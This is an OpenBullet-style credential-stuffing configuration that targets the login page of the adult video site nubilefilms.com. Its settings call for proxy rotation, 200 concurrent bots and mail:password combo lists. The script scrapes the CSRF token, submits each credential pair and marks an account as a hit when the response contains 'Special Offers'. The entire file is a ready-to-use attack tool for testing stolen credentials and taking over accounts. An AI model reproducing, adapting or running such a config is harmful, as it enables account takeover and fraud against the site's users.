[SETTINGS]
{
  "Name": "Nubilefilms",
  "SuggestedBots": 200,
  "LastModified": "2019-06-26T22:21:21.6639455-04:00",
  "AdditionalInfo": "",
  "Author": "LordV",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://nubilefilms.com/authentication/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
#Token PARSE "<SOURCE>" LR "name=\"csrf-token\" value=\"" "\" type=\"hidden\">" -> VAR "Token" 
#Login REQUEST POST "https://nubilefilms.com/authentication/login" 
  CONTENT "username=<USER>&password=<PASS>&site_select=4&r=members.nubilefilms.com%2F&csrf-token=<Token>&sign-in=Sign+In" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
#Checker KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Special Offers" 
  KEYCHAIN Failure OR 
    KEY "The username or password you've entered is incorrect." 
